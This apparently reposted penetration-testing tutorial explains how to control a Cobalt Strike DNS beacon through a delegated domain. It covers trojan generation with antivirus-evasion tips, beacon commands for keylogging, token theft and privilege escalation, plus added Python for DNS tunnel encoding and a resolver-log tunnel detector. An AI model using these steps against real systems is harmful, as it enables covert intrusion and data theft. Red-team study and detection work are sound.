Control Meterpreter through DNS Tunnel
Do I really need to explain the benefits of controlling targets over DNS during a penetration test? As everyone knows, if the payload does not open a listening port and only sends DNS queries, it gets past most firewalls and the traffic is inconspicuous. Cobalt Strike has a Beacon payload that can carry its data over DNS, HTTP or SMB. Below I take DNS as the example.
1. Domain Name settings
First, we need a domain name. Create an A record pointing at our Metasploit server. Remember not to put the domain behind a CDN or similar proxy: the DNS queries must reach our server directly.
Then create two or three NS records that point at the name of the A record we just created.
In this way, any DNS lookup under those NS names is delegated to our Metasploit server, which answers it itself.
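As an added illustration (not part of the original article), this is what the records from step 1 look like in a BIND-style zone file. The domain is assumed to be example.com and the team server is assumed to sit at 203.0.113.10 (a documentation address); the names ns1, ns2, c1 and c2 are also assumptions. The A records give the server a name, and the NS records delegate the beacon subdomains to it, so every query for anything under c1.example.com or c2.example.com is forwarded to the team server.

```zone
; Added example zone fragment for example.com (assumed names and addresses).
; Team server running Cobalt Strike + Metasploit: 203.0.113.10
ns1     IN  A   203.0.113.10
ns2     IN  A   203.0.113.10

; NS records pointing at the A records above: lookups for *.c1.example.com
; and *.c2.example.com are delegated to, and answered by, the team server.
c1      IN  NS  ns1.example.com.
c2      IN  NS  ns2.example.com.
```

Before building a payload, check the delegation from a resolver outside your own network: if a query for a random name under c1.example.com does not arrive at the team server on UDP port 53, the beacon will never check in.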
2. Cobalt Strike settings
In the Cobalt Strike, we add a listener.
The HOST field is the IP address of the Metasploit server. When you click Save, you are asked to enter the NS records; here, enter the ones created in step 1 (the three created above).
The listener is now set up. Next we generate a trojan to test it.
3. Trojan generation
Find the Windows trojan generator under Attacks -> Packages.
Listener: select the one we just created (there are two; pick the one marked DNS). Output formats include EXE, EXE with service, DLL and others. (In my testing, the DLL payload generated for the DNS listener got past a large share of anti-virus products.)
Put the generated dns.exe on the virtual machine and run it.
Port status before running
Port status after running
No new port is opened. Capture packets to confirm what the program is doing:
it is talking over DNS.
Go back to Cobalt Strike, open the Beacons manager, and a host shows up checking in to us.
Right-click it. In the menu, choose sleep to set the check-in interval, and interact to open the command console.
The first thing to set is the data channel: the mode command accepts dns, dns-txt, http and smb. For a DNS beacon, choose between dns and dns-txt: dns carries data back in A records (four bytes per answer, so very little per poll), while dns-txt carries it in TXT records, which hold far more data per answer.
Here I set it to mode dns-txt (you can use TAB to complete the command).
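To make the dns versus dns-txt difference concrete, here is an added example of how a DNS data channel works. It is my own illustration, not Cobalt Strike's actual encoding, whose wire format is not shown on this page. Data going up to the server is base32-encoded into the subdomain labels of the query name, subject to the 63-byte label and 253-byte name limits; data coming back to the beacon fits into either a 4-byte A answer or a TXT answer of up to 255 bytes. The zone beacon.example.com, the session label and the sequence-number layout are assumptions.

```python
from __future__ import annotations

import base64
import math

MAX_LABEL = 63    # RFC 1035: one label is at most 63 octets
MAX_NAME = 253    # practical maximum length of a full name in text form
A_BYTES = 4       # an A answer carries one IPv4 address: 4 bytes of data
TXT_BYTES = 255   # one TXT character-string carries up to 255 bytes (one string per answer assumed)


def _b32(data: bytes) -> str:
    """Unpadded, lower-case base32: DNS names are case-insensitive, so base32
    (5 bits per character) is the densest alphabet that survives a resolver."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def bytes_per_query(zone: str, session: str) -> int:
    """Payload bytes one query name can carry once the fixed labels are reserved."""
    prefix = f"{0:04x}.{session}."             # "<seq>.<session>." layout is an assumption
    budget = MAX_NAME - len(prefix) - len(zone) - 1
    labels = budget // (MAX_LABEL + 1)          # full 63-char labels plus their dots
    return labels * MAX_LABEL // 8 * 5          # 8 base32 chars = 5 bytes; keeps chunks padding-free


def upstream_queries(data: bytes, zone: str, session: str = "a1") -> list[str]:
    """Split data into query names shaped like <seq>.<session>.<b32>.<b32>.<zone>."""
    step = bytes_per_query(zone, session)
    names = []
    for seq, off in enumerate(range(0, len(data), step)):
        enc = _b32(data[off:off + step])
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        names.append(".".join([f"{seq:04x}", session, *labels, zone]))
    return names


def decode_upstream(names: list[str], zone: str) -> bytes:
    """What the authoritative server does: strip the zone, reorder by sequence, decode.
    Queries may arrive out of order or twice (resolver retries), hence the dict."""
    chunks = {}
    for name in names:
        host = name[: -len(zone) - 1]
        seq, _session, *labels = host.split(".")
        chunks[int(seq, 16)] = "".join(labels)
    enc = "".join(chunks[k] for k in sorted(chunks))
    enc += "=" * (-len(enc) % 8)                # restore the padding _b32 stripped
    return base64.b32decode(enc, casefold=True)


def downstream_answers(nbytes: int, mode: str) -> int:
    """Number of responses needed to deliver nbytes of tasking to the beacon."""
    per_answer = {"dns": A_BYTES, "dns-txt": TXT_BYTES}[mode]
    return math.ceil(nbytes / per_answer)


if __name__ == "__main__":
    zone = "beacon.example.com"                 # assumed delegated zone
    payload = b"whoami output: corp\\alice\r\n" * 20
    queries = upstream_queries(payload, zone)
    print(f"{len(queries)} queries carry {len(payload)} bytes upstream, e.g.")
    print("  " + queries[0])
    for mode in ("dns", "dns-txt"):
        print(f"4 KB of tasking downstream over {mode}: {downstream_answers(4096, mode)} answers")
```

Running it shows why dns-txt is the mode to use when pulling anything bigger than a few bytes: a 4 KB task needs over a thousand A answers but only seventeen TXT answers, and the beacon sleeps between polls.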
Enter help to view supported commands.
Command           Description
-------           -----------
bypassuac         Spawn a session in a high-integrity process
cd                Change directory
checkin           Call home and post data
clear             Clear the beacon task queue
download          Download a file
execute           Execute a program on the target (no output is returned)
exit              Terminate the beacon session
getsystem         Attempt to get SYSTEM
getuid            Get user ID
help              Help menu
inject            Spawn a session in a specific process
keylogger start   Start the keystroke logger
keylogger stop    Stop the keystroke logger
message           Display a message to the user on the desktop
meterpreter       Spawn a Meterpreter session
link              Connect to a Beacon peer over SMB
mode dns          Use DNS A records as the data channel (DNS beacon only)
mode dns-txt      Use DNS TXT records as the data channel (DNS beacon only)
mode http         Use HTTP as the data channel
mode smb          Use SMB peer-to-peer communication
rev2self          Revert to the original token
shell             Execute a command via cmd.exe
sleep             Set the beacon sleep time
socks             Start a SOCKS4a server to relay traffic
socks stop        Stop the SOCKS4a server
spawn             Spawn a session
spawnto           Set the executable to spawn processes into
steal_token       Steal the access token from a process
task              Download and execute a file from a URL
timestomp         Apply timestamps from one file to another
unlink            Disconnect from the parent Beacon
upload            Upload a file
Here I demonstrate a few common commands.
getuid
execute runs an executable program directly; it does not go through cmd.exe and returns no output, so shell built-ins cannot be run this way (use shell for those).
shell
meterpreter spawns a Meterpreter session through the beacon, and the response comes back from Meterpreter.
The remaining commands are left for you to try.
The advantage is that it is fairly inconspicuous on the target host (no listening port, no connection other than DNS queries) and gets through firewalls well. The disadvantages are that the result of each command comes back slowly, and that every byte still crosses the network as a DNS query, so the recursive resolver and any DNS monitoring see the whole exchange.
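The flip side of "invisible on the host" is what the packet capture above already showed: the beacon's data travels as DNS queries, so the recursive resolver's log is where it gets caught. As an added example (my own, not from the article), the following script scores a constructed resolver log for the signs of a DNS data channel: one client sending a stream of long, never-repeating subdomains, many of them TXT queries, to a single domain. The log format, the sample lines and the thresholds are assumptions to adapt to your own resolver.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log, not real traffic: "<time> <client> <qname> <qtype>".
# 10.0.0.5 browses normally; 10.0.0.7 runs a beacon whose queries carry
# encoded data in long, never-repeating subdomain labels.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 www.example.org A
10:00:02 10.0.0.5 mail.example.org MX
10:00:03 10.0.0.7 0000.a1.kbwwc2lomvzgqzlsmu.beacon.example.com A
10:00:04 10.0.0.7 0001.a1.nbxxk4dtnfxgs4zan5rwk4tbornwy.beacon.example.com TXT
10:00:05 10.0.0.7 0002.a1.ibxxk4dtnfxgs4zanfxg6ylfmnxxayrb.beacon.example.com TXT
10:00:06 10.0.0.7 0003.a1.nbzxgzlomu2ggyltonxxi23fnbqw4lr.beacon.example.com TXT
10:00:07 10.0.0.5 cdn.example.org A
10:00:08 10.0.0.7 0004.a1.gezdgnbvgy3tqojqmfsgs2lmmfswo5dv.beacon.example.com A
"""

# Thresholds are assumptions; tune them against a week of your own resolver logs.
MIN_QUERIES = 5        # ignore domains a client touches only a few times
MIN_AVG_SUBLEN = 25    # real hostnames are rarely this long on average
MIN_UNIQUE = 0.9       # a tunnel never repeats a name (a repeat would be served from cache)


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payload scores high, dictionary words score low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    """Last two labels. Production code should use the public suffix list
    (co.uk, com.cn ...); two labels suffice for this constructed sample."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def parse_line(line: str):
    parts = line.split()
    if len(parts) != 4:
        return None
    _ts, client, qname, qtype = parts
    return client, qname.lower(), qtype.upper()


def analyze_log(text: str) -> dict:
    """Group queries per (client, registered domain) and compute tunnel indicators."""
    groups = defaultdict(list)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec:
            client, qname, qtype = rec
            groups[(client, registered_domain(qname))].append((qname, qtype))
    report = {}
    for (client, dom), recs in groups.items():
        subs = [q[: -len(dom) - 1] if q.endswith("." + dom) else "" for q, _ in recs]
        n = len(recs)
        report[(client, dom)] = {
            "queries": n,
            "avg_sublen": sum(map(len, subs)) / n,
            "unique_ratio": len({q for q, _ in recs}) / n,
            "txt_fraction": sum(1 for _, t in recs if t == "TXT") / n,
            "avg_entropy": sum(map(shannon_entropy, subs)) / n,
        }
    return report


def flag_tunnels(report: dict) -> list:
    """(client, domain) pairs whose query pattern looks like a data channel."""
    return sorted(
        key for key, f in report.items()
        if f["queries"] >= MIN_QUERIES
        and f["avg_sublen"] >= MIN_AVG_SUBLEN
        and f["unique_ratio"] >= MIN_UNIQUE
    )


if __name__ == "__main__":
    rep = analyze_log(SAMPLE_LOG)
    for client, dom in flag_tunnels(rep):
        f = rep[(client, dom)]
        print(f"{client} -> {dom}: {f['queries']} queries, avg subdomain {f['avg_sublen']:.1f} chars, "
              f"TXT share {f['txt_fraction']:.0%}, entropy {f['avg_entropy']:.2f} bits/char")
```

On the sample, only the beacon host is flagged; the TXT share and entropy are reported as supporting evidence rather than used as hard rules, because a beacon in mode dns issues only A queries and a long sleep value keeps the query count per hour low, so tune the window and thresholds to your own environment.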
[Via @ drops]